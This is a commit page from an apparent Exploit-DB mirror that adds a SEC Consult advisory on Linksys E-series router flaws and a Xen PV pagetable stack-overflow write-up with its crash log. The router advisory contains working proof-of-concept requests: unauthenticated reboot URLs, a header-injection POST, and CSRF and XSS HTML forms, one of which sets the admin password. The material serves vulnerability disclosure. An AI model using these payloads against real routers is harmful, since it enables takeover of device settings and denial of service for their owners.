bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-10-19

Browse source 
5 new exploits

Too many to list!
This commit is contained in:
Offensive Security 2017-10-19 05:01:29 +00:00
parent 519f2f59ba
commit 5d67bcf186
8 changed files with 5626 additions and 4553 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9107
files.csv
View file

File diff suppressed because it is too large Load diff

435
platforms/cgi/webapps/43013.txt Executable file
View file

@ -0,0 +1,435 @@
SEC Consult Vulnerability Lab Security Advisory < 20171018-1 >
=======================================================================
title: Multiple vulnerabilities
product: Linksys E series, see "Vulnerable / tested versions"
vulnerable version: see "Vulnerable / tested versions"
fixed version: no public fix, see solution/timeline
CVE number: -
impact: high
homepage: http://www.linksys.com/
found: 2017-06-26
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Today, Belkin International has three brands Belkin, Linksys and WeMo
to enhance the technology that connects us to the people, activities
and experiences we love. Belkin products are renowned for their
simplicity and ease of use, while our Linksys brand helped make
wireless connectivity mainstream around the globe. Our newest brand,
WeMo, is the leader in delivering customizable smart home experiences.
Its product platform empowers people to monitor, measure and manage
their electronics, appliances and lighting at home and on-the-go."
Source: http://www.belkin.com/uk/aboutUs/
Business recommendation:
------------------------
SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security
professionals and all identified issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) Denial of Service (DoS)
A denial of service vulnerability is present in the web server of the
device. This vulnerability is very simple to trigger since a single GET
request to a cgi-script is sufficient.
A crafted GET request, e.g. triggered by CSRF over a user in the
internal network, can reboot the whole device or freeze the web interface
and the DHCP service. This action does not require authentication.
2) HTTP Header Injection & Open Redirect
Due to a flaw in the web service a header injection can be triggered
without authentication. This kind of vulnerability can be used to perform
different arbitrary actions. One example in this case is an open redirection
to another web site. In the worst case a session ID of an authenticated user
can be stolen this way because the session ID is embedded into the url
which is another flaw of the web service.
3) Improper Session-Protection
The session ID for administrative users can be fetched from the device from
LAN without credentials because of insecure session handling.
This vulnerability can only be exploited when an administrator was
authenticated to the device before the attack and opened a session previously.
The login works if the attacker has the same IP address as the PC
of the legitimate administrator. Therefore, a CSRF attack is possible when
the administrator is lured to surf on a malicious web site or to click on
a malicious link.
4) Cross-Site Request Forgery Vulnerability in Admin Interface
A cross-site request forgery vulnerability can be triggered in the
administrative interface. This vulnerability can be exploited because the
session ID can be hijacked by using 3) via LAN. An exploitation via internet
is only possible if the session id is exposed to the internet (for example via
the referrer).
An attacker can change any configuration of the device by luring a user to
click on a malicious link or surf to a malicious web-site.
5) Cross-Site Scripting Vulnerability in Admin Interface
A cross-site scripting vulnerability can be triggered in the administrative
interface. This vulnerability can be exploited because the session ID can
be hijacked by using 3) via LAN. An exploitation via internet is only possible
if the session id is exposed to the internet (for example via the referrer).
By using this vulnerability, malicious code can be executed in the context of
the browser session of the attacked user.
Proof of concept:
-----------------
1) Denial of Service
Unauthenticated request for triggering a router reboot in browser:
http://<Router-IP>/upgrade.cgi
http://<Router-IP>/restore.cgi
Unauthenticated request for triggering a router freeze in browser:
http://<Router-IP>/mfgtst.cgi
2) HTTP Header Injection & Open Redirect
A header injection can be triggered by the following unauthenticated request:
Request:
------------------------------------------------------------------------------
POST /UnsecuredEnable.cgi HTTP/1.1
Host: <Router-IP>
Accept: */*
Accept-Language: en
Connection: close
Referer: http://<Router-IP>/Unsecured.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
submit_type=&submit_button=UnsecuredEnable&gui_action=Apply&wait_time=19&next_url=INJEC%0d%0aTION&change_action=
------------------------------------------------------------------------------
Response:
------------------------------------------------------------------------------
HTTP/1.1 302 Redirect
Server: httpd
Date: Thu, 01 Jan 1970 00:27:41 GMT
Location: http://INJEC
TION
Content-Type: text/plain
Connection: close
------------------------------------------------------------------------------
Setting a new location will result in an open redirect:
Request:
------------------------------------------------------------------------------
POST /UnsecuredEnable.cgi HTTP/1.1
Host: <Router-IP>
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
submit_type=&submit_button=UnsecuredEnable&gui_action=Apply&wait_time=19&next_url=www.sec-consult.com&change_action=
------------------------------------------------------------------------------
Response:
------------------------------------------------------------------------------
HTTP/1.1 302 Redirect
Server: httpd
Date: Thu, 01 Jan 1970 00:27:57 GMT
Location: http://www.sec-consult.com
Content-Type: text/plain
Connection: close
------------------------------------------------------------------------------
3) Improper Session-Protection
These two requests can be used to fetch the current session ID of an authenticated
user.
http://<Device-IP>/BlockTime.asp
http://<Device-IP>/BlockSite.asp
The response is nearly the same (except the "inetblock" and "blocksite"
functions):
-------------------------------------------------------------------------------
HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 00:04:32 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
[...]
function init()
{
var close_session = "0";
if ( close_session == "1" )
{
document.forms[0].action= "hndUnblock.cgi";
}
else
{
document.forms[0].action= "hndUnblock.cgi?session_id=<Session-ID>";
}
}
</script>
</head>
<body id="blocked" onload=init()>
<div id="content">
<div class="h1">
<h1><span><script>Capture(hndmsg.blocksite)</script>
</span>
</h1>
</div>
[...]
</body>
</html>
-------------------------------------------------------------------------------
4) Cross-Site Request Forgery Vulnerability in Admin Interface
The following proof of concept HTML code can change the router password by
exploiting CSRF after replacing the <Session-ID> with the fetched one from 3).
The new password is "secconsult".
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/apply.cgi?session_id=<Session-ID>" method="POST">
<input type="hidden" name="submit&#95;button" value="Management" />
<input type="hidden" name="change&#95;action" value="" />
<input type="hidden" name="gui&#95;action" value="Apply" />
<input type="hidden" name="PasswdModify" value="1" />
<input type="hidden" name="http&#95;enable" value="1" />
<input type="hidden" name="https&#95;enable" value="0" />
<input type="hidden" name="ctm404&#95;enable" value="" />
<input type="hidden" name="remote&#95;mgt&#95;https" value="0" />
<input type="hidden" name="wait&#95;time" value="4" />
<input type="hidden" name="need&#95;reboot" value="0" />
<input type="hidden" name="http&#95;passwd" value="secconsult" />
<input type="hidden" name="http&#95;passwdConfirm" value="secconsult" />
<input type="hidden" name="&#95;http&#95;enable" value="1" />
<input type="hidden" name="web&#95;wl&#95;filter" value="0" />
<input type="hidden" name="remote&#95;management" value="0" />
<input type="hidden" name="nf&#95;alg&#95;sip" value="0" />
<input type="hidden" name="upnp&#95;enable" value="1" />
<input type="hidden" name="upnp&#95;config" value="1" />
<input type="hidden" name="upnp&#95;internet&#95;dis" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
5) Cross-Site Scripting Vulnerability in Admin Interface
The <Session-ID> must be replaced again. The "apply.cgi" script can be abused
to trigger the cross-site scripting vulnerability.
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/apply.cgi?session_id=<Session-ID>" method="POST">
<input type="hidden" name="submit&#95;button" value="index" />
<input type="hidden" name="change&#95;action" value="" />
<input type="hidden" name="submit&#95;type" value="" />
<input type="hidden" name="gui&#95;action" value="Apply" />
<input type="hidden" name="now&#95;proto" value="dhcp" />
<input type="hidden" name="daylight&#95;time" value="1" />
<input type="hidden" name="switch&#95;mode" value="0" />
<input type="hidden" name="hnap&#95;devicename" value="csrft_POC" />
<input type="hidden" name="need&#95;reboot" value="0" />
<input type="hidden" name="user&#95;language" value="" />
<input type="hidden" name="wait&#95;time" value="1';alert('XSS-PoC')//155" />
<input type="hidden" name="dhcp&#95;start" value="100" />
<input type="hidden" name="dhcp&#95;start&#95;conflict" value="0" />
<input type="hidden" name="lan&#95;ipaddr" value="4" />
<input type="hidden" name="ppp&#95;demand&#95;pppoe" value="9" />
<input type="hidden" name="ppp&#95;demand&#95;pptp" value="9" />
<input type="hidden" name="ppp&#95;demand&#95;l2tp" value="9" />
<input type="hidden" name="ppp&#95;demand&#95;hb" value="9" />
<input type="hidden" name="wan&#95;ipv6&#95;proto" value="dhcp" />
<input type="hidden" name="detect&#95;lang" value="en" />
<input type="hidden" name="wan&#95;proto" value="dhcp" />
<input type="hidden" name="wan&#95;hostname" value="" />
<input type="hidden" name="wan&#95;domain" value="" />
<input type="hidden" name="mtu&#95;enable" value="0" />
<input type="hidden" name="lan&#95;ipaddr&#95;0" value="192" />
<input type="hidden" name="lan&#95;ipaddr&#95;1" value="168" />
<input type="hidden" name="lan&#95;ipaddr&#95;2" value="1" />
<input type="hidden" name="lan&#95;ipaddr&#95;3" value="1" />
<input type="hidden" name="lan&#95;netmask" value="255&#46;255&#46;255&#46;0" />
<input type="hidden" name="machine&#95;name" value="Linksys09355" />
<input type="hidden" name="lan&#95;proto" value="dhcp" />
<input type="hidden" name="dhcp&#95;check" value="" />
<input type="hidden" name="dhcp&#95;start&#95;tmp" value="100" />
<input type="hidden" name="dhcp&#95;num" value="50" />
<input type="hidden" name="dhcp&#95;lease" value="0" />
<input type="hidden" name="wan&#95;dns" value="4" />
<input type="hidden" name="wan&#95;dns0&#95;0" value="0" />
<input type="hidden" name="wan&#95;dns0&#95;1" value="0" />
<input type="hidden" name="wan&#95;dns0&#95;2" value="0" />
<input type="hidden" name="wan&#95;dns0&#95;3" value="0" />
<input type="hidden" name="wan&#95;dns1&#95;0" value="0" />
<input type="hidden" name="wan&#95;dns1&#95;1" value="0" />
<input type="hidden" name="wan&#95;dns1&#95;2" value="0" />
<input type="hidden" name="wan&#95;dns1&#95;3" value="0" />
<input type="hidden" name="wan&#95;dns2&#95;0" value="0" />
<input type="hidden" name="wan&#95;dns2&#95;1" value="0" />
<input type="hidden" name="wan&#95;dns2&#95;2" value="0" />
<input type="hidden" name="wan&#95;dns2&#95;3" value="0" />
<input type="hidden" name="wan&#95;wins" value="4" />
<input type="hidden" name="wan&#95;wins&#95;0" value="0" />
<input type="hidden" name="wan&#95;wins&#95;1" value="0" />
<input type="hidden" name="wan&#95;wins&#95;2" value="0" />
<input type="hidden" name="wan&#95;wins&#95;3" value="0" />
<input type="hidden" name="time&#95;zone" value="&#45;08&#32;1&#32;1" />
<input type="hidden" name="&#95;daylight&#95;time" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
Vulnerable / tested versions:
-----------------------------
Linksys E2500 - 3.0.02 (build 2)
According to the Linksys security contact the following products are
affected too:
Linksys E900 (Version: 1.0.06)
Linksys E1200 (Version: 2.0.07 Build 5)
Linksys E8400 AC2400 Dual-Band Wi-Fi Router (Version: basic version ?)
Based on information embedded in the firmware of other Linksys products
gathered from our IoT Inspector tool we believe the following devices
are affected as well:
Linksys E900 (Version: 1.0.06) -- confirmed by vendor
Linksys E900-ME (Version: 1.0.06)
Linksys E1200 (Version: 2.0.07 Build 5) -- confirmed by vendor
Linksys E1500 (Version: 1.0.06 Build 1)
Linksys E3200 (Version: 1.0.05 Build 2)
Linksys E4200 (Version: 1.0.06 Build 3)
Linksys WRT54G2 (Version: 1.5.02 Build 5)
Vendor contact timeline:
------------------------
2017-07-10: Contacting vendor through security@linksys.com. Set release date
to 2017-08-29.
2017-07-12: Confirmation of recipient. The contact also states that
the unit is older and they have to look for it.
2017-08-07: Asking for update; Contact responds that they have to look for
such a unit in their inventory.
2017-08-08: Contact responds that he verified three of four vulnerabilities.
2017-08-09: Sent PCAP dump and more information about vulnerability #4 to
assist the contact with verification.
2017-08-18: Sending new advisory version to contact and asking for an update;
No answer.
2017-08-22: Asking for an update; Contact states that he is trying to get a
fixed firmware from the OEM.
2017-08-24: Asked the vendor how much additional time he will need.
2017-08-25: Vendor states that it is difficult to get an update from the OEM
due to the age of the product ("Many of the engineers who
originally worked on this code base are no longer with the
company"). Clarified some CORS/SOP issues which were
misunderstood.
2017-08-30: Sending Proof of Concept for CSRF/XSS as HTML files to the vendor.
Changed the vulnerability description of the advisory to
explain the possibility of exploiting the CSRF/XSS vulnerabilities
from LAN and WAN side.
2017-09-07: Asking for an update; Vendor agrees with the new vulnerability
descriptions and states that the OEM got back to them with a fix
for the E2500 and they are in the QA phase. The vendor is expecting
fixes for E900, E1200, and E8400 later this week or next week to
hand them over to QA.
2017-09-07: Stated that E8400 was not found by the IoT Inspector because there
was no firmware available to download online. Stated that it will
be available in the next version of the advisory. Shifting the
advisory release to 2017-09-26.
Asking for confirmation of the other reported devices:
Linksys E900-ME (Version: 1.0.06)
Linksys E1500 (Version: 1.0.06 Build 1)
Linksys E3200 (Version: 1.0.05 Build 2)
Linksys E4200 (Version: 1.0.06 Build 3)
Linksys WRT54G2 (Version: 1.5.02 Build 5)
No answer.
2017-09-18: Sending new version of the advisory to the vendor. Asking for an
update; No answer.
2017-09-21: Asking for an update; No answer.
2017-09-26: Asking for an update; No answer.
2017-10-02: Asking for an update and shifting the advisory release to
2017-10-09; No answer.
2017-10-16: Informing the vendor that the advisory will be released on
2017-10-18 because vendor is unresponsive.
2017-10-18: Public release of security advisory
Solution:
---------
Upgrade to new firmware version as soon as the vendor publishes it.
Workaround:
-----------
Restrict network access to the device.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2017

286
platforms/linux/dos/43014.txt Executable file
View file

@ -0,0 +1,286 @@
Xen allows pagetables of the same level to map each other as readonly
in PV domains. This is useful if a guest wants to use the
self-referential pagetable trick for easy access to pagetables
by mapped virtual address.
When cleaning up a pagetable after the last typed reference to it has been
dropped (via __put_page_type() -> __put_final_page_type() -> free_page_type()),
Xen will recursively drop the typed refcounts of pages referenced by the pagetable,
potentially recursively cleaning them up as well.
For normal pagetables, the recursion depth is bounded by the number of paging levels
the architecture supports. However, no such depth limit exists for pagetables of the
same depth that map each other.
The attached PoC will set up a chain of 1000 L4 pagetables such that
the first pagetable is type-pinned and each following pagetable is referenced by the
previous one. Then, the type-pin of the first pagetable is removed, and the following
999 pagetables are recursively cleaned up, causing a stack overflow.
To run the PoC in a PV domain, install kernel headers, then run ./compile, then load the built module via insmod.
Xen console output caused by running the PoC inside a normal PV domain:
==============================
(XEN) Xen version 4.8.1 (Debian 4.8.1-1+deb9u3) (ian.jackson@eu.citrix.com) (gcc (Debian 6.3.0-18) 6.3.0 20170516) debug=n Thu Sep 7 18:24:26 UTC 2017
(XEN) Bootloader: GRUB 2.02~beta3-5
(XEN) Command line: loglvl=all com1=115200,8n1,pci console=com1 placeholder
(XEN) Video information:
(XEN) VGA is text mode 80x25, font 8x16
(XEN) Disc information:
(XEN) Found 1 MBR signatures
(XEN) Found 1 EDD information structures
(XEN) Xen-e820 RAM map:
(XEN) 0000000000000000 - 000000000009fc00 (usable)
(XEN) 000000000009fc00 - 00000000000a0000 (reserved)
(XEN) 00000000000f0000 - 0000000000100000 (reserved)
(XEN) 0000000000100000 - 00000000dfff0000 (usable)
(XEN) 00000000dfff0000 - 00000000e0000000 (ACPI data)
(XEN) 00000000fec00000 - 00000000fec01000 (reserved)
(XEN) 00000000fee00000 - 00000000fee01000 (reserved)
(XEN) 00000000fffc0000 - 0000000100000000 (reserved)
(XEN) 0000000100000000 - 0000000120000000 (usable)
(XEN) ACPI: RSDP 000E0000, 0024 (r2 VBOX )
(XEN) ACPI: XSDT DFFF0030, 003C (r1 VBOX VBOXXSDT 1 ASL 61)
(XEN) ACPI: FACP DFFF00F0, 00F4 (r4 VBOX VBOXFACP 1 ASL 61)
(XEN) ACPI: DSDT DFFF0470, 210F (r1 VBOX VBOXBIOS 2 INTL 20140214)
(XEN) ACPI: FACS DFFF0200, 0040
(XEN) ACPI: APIC DFFF0240, 0054 (r2 VBOX VBOXAPIC 1 ASL 61)
(XEN) ACPI: SSDT DFFF02A0, 01CC (r1 VBOX VBOXCPUT 2 INTL 20140214)
(XEN) System RAM: 4095MB (4193852kB)
(XEN) No NUMA configuration found
(XEN) Faking a node at 0000000000000000-0000000120000000
(XEN) Domain heap initialised
(XEN) CPU Vendor: Intel, Family 6 (0x6), Model 78 (0x4e), Stepping 3 (raw 000406e3)
(XEN) found SMP MP-table at 0009fff0
(XEN) DMI 2.5 present.
(XEN) Using APIC driver default
(XEN) ACPI: PM-Timer IO Port: 0x4008 (32 bits)
(XEN) ACPI: SLEEP INFO: pm1x_cnt[1:4004,1:0], pm1x_evt[1:4000,1:0]
(XEN) ACPI: wakeup_vec[dfff020c], vec_size[20]
(XEN) ACPI: Local APIC address 0xfee00000
(XEN) ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
(XEN) ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
(XEN) IOAPIC[0]: apic_id 1, version 32, address 0xfec00000, GSI 0-23
(XEN) ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
(XEN) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)
(XEN) ACPI: IRQ0 used by override.
(XEN) ACPI: IRQ2 used by override.
(XEN) ACPI: IRQ9 used by override.
(XEN) Enabling APIC mode: Flat. Using 1 I/O APICs
(XEN) ERST table was not found
(XEN) Using ACPI (MADT) for SMP configuration information
(XEN) SMP: Allowing 1 CPUs (0 hotplug CPUs)
(XEN) IRQ limits: 24 GSI, 184 MSI/MSI-X
(XEN) Not enabling x2APIC: depends on iommu_supports_eim.
(XEN) xstate: size: 0x440 and states: 0x7
(XEN) CPU0: No MCE banks present. Machine check support disabled
(XEN) Using scheduler: SMP Credit Scheduler (credit)
(XEN) Platform timer is 3.579MHz ACPI PM Timer
(XEN) Detected 2807.850 MHz processor.
(XEN) Initing memory sharing.
(XEN) alt table ffff82d0802bcf38 -> ffff82d0802be594
(XEN) I/O virtualisation disabled
(XEN) nr_sockets: 1
(XEN) ENABLING IO-APIC IRQs
(XEN) -> Using new ACK method
(XEN) ..TIMER: vector=0xF0 apic1=0 pin1=2 apic2=-1 pin2=-1
(XEN) Allocated console ring of 16 KiB.
(XEN) Brought up 1 CPUs
(XEN) build-id: cd504b2b380e2fe1265376aa845a404b9eb86982
(XEN) CPUIDLE: disabled due to no HPET. Force enable with 'cpuidle'.
(XEN) ACPI sleep modes: S3
(XEN) VPMU: disabled
(XEN) xenoprof: Initialization failed. Intel processor family 6 model 78is not supported
(XEN) Dom0 has maximum 208 PIRQs
(XEN) NX (Execute Disable) protection active
(XEN) *** LOADING DOMAIN 0 ***
(XEN) Xen kernel: 64-bit, lsb, compat32
(XEN) Dom0 kernel: 64-bit, PAE, lsb, paddr 0x1000000 -> 0x1f5a000
(XEN) PHYSICAL MEMORY ARRANGEMENT:
(XEN) Dom0 alloc.: 0000000118000000->000000011a000000 (989666 pages to be allocated)
(XEN) Init. ramdisk: 000000011ed74000->000000011ffff3b5
(XEN) VIRTUAL MEMORY ARRANGEMENT:
(XEN) Loaded kernel: ffffffff81000000->ffffffff81f5a000
(XEN) Init. ramdisk: 0000000000000000->0000000000000000
(XEN) Phys-Mach map: 0000008000000000->00000080007a6370
(XEN) Start info: ffffffff81f5a000->ffffffff81f5a4b4
(XEN) Page tables: ffffffff81f5b000->ffffffff81f6e000
(XEN) Boot stack: ffffffff81f6e000->ffffffff81f6f000
(XEN) TOTAL: ffffffff80000000->ffffffff82000000
(XEN) ENTRY ADDRESS: ffffffff81d38180
(XEN) Dom0 has maximum 1 VCPUs
(XEN) Scrubbing Free RAM on 1 nodes using 1 CPUs
(XEN) ....................................done.
(XEN) Initial low memory virq threshold set at 0x4000 pages.
(XEN) Std. Loglevel: All
(XEN) Guest Loglevel: Nothing (Rate-limited: Errors and warnings)
(XEN) *** Serial input -> DOM0 (type 'CTRL-a' three times to switch input to Xen)
(XEN) Freed 312kB init memory
mapping kernel into physical memory
about to get started...
(XEN) d0 attempted to change d0v0's CR4 flags 00000620 -> 00040660
(XEN) PCI add device 0000:00:00.0
(XEN) PCI add device 0000:00:01.0
(XEN) PCI add device 0000:00:01.1
(XEN) PCI add device 0000:00:02.0
(XEN) PCI add device 0000:00:03.0
(XEN) PCI add device 0000:00:04.0
(XEN) PCI add device 0000:00:05.0
(XEN) PCI add device 0000:00:06.0
(XEN) PCI add device 0000:00:07.0
(XEN) PCI add device 0000:00:08.0
(XEN) PCI add device 0000:00:0d.0
Debian GNU/Linux 9 xenhost hvc0
xenhost login: (XEN) d1 attempted to change d1v0's CR4 flags 00000620 -> 00040660
(XEN) d1 attempted to change d1v1's CR4 flags 00000620 -> 00040660
(XEN) *** DOUBLE FAULT ***
(XEN) ----[ Xen-4.8.1 x86_64 debug=n Not tainted ]----
(XEN) CPU: 0
(XEN) RIP: e008:[<ffff82d08017962a>] free_page_type+0xea/0x630
(XEN) RFLAGS: 0000000000010206 CONTEXT: hypervisor
(XEN) rax: 000000000000a3db rbx: ffff82e000147b60 rcx: 0000000000000000
(XEN) rdx: ffff830000000000 rsi: 4000000000000000 rdi: 000000000000a3db
(XEN) rbp: 4400000000000001 rsp: ffff8300dfce5ff8 r8: ffff8300dfce7fff
(XEN) r9: ffff82d0802f2980 r10: 0000000000000000 r11: 0000000000000202
(XEN) r12: 000000000000a3db r13: ffff83011fd74000 r14: ffff83011fd74000
(XEN) r15: 0000000000000000 cr0: 000000008005003b cr4: 00000000000406a0
(XEN) cr3: 000000000702d000 cr2: ffff8300dfce5fe8
(XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: e010 cs: e008
(XEN) Valid stack range: ffff8300dfce6000-ffff8300dfce8000, sp=ffff8300dfce5ff8, tss.esp0=ffff8300dfce7fc0
(XEN) Xen stack overflow (dumping trace ffff8300dfce6000-ffff8300dfce8000):
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d08016af21>] io_apic.c#ack_edge_ioapic_irq+0x11/0x60
(XEN) [<ffff82d08016af21>] io_apic.c#ack_edge_ioapic_irq+0x11/0x60
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d0801793ae>] mm.c#get_page_from_pagenr+0x4e/0x60
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d0801768e9>] is_iomem_page+0x9/0x70
(XEN) [<ffff82d08010baec>] grant_table.c#__gnttab_unmap_common_complete+0x17c/0x360
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080146684>] serial_tx_interrupt+0xe4/0x120
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017234a>] do_IRQ+0x22a/0x660
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
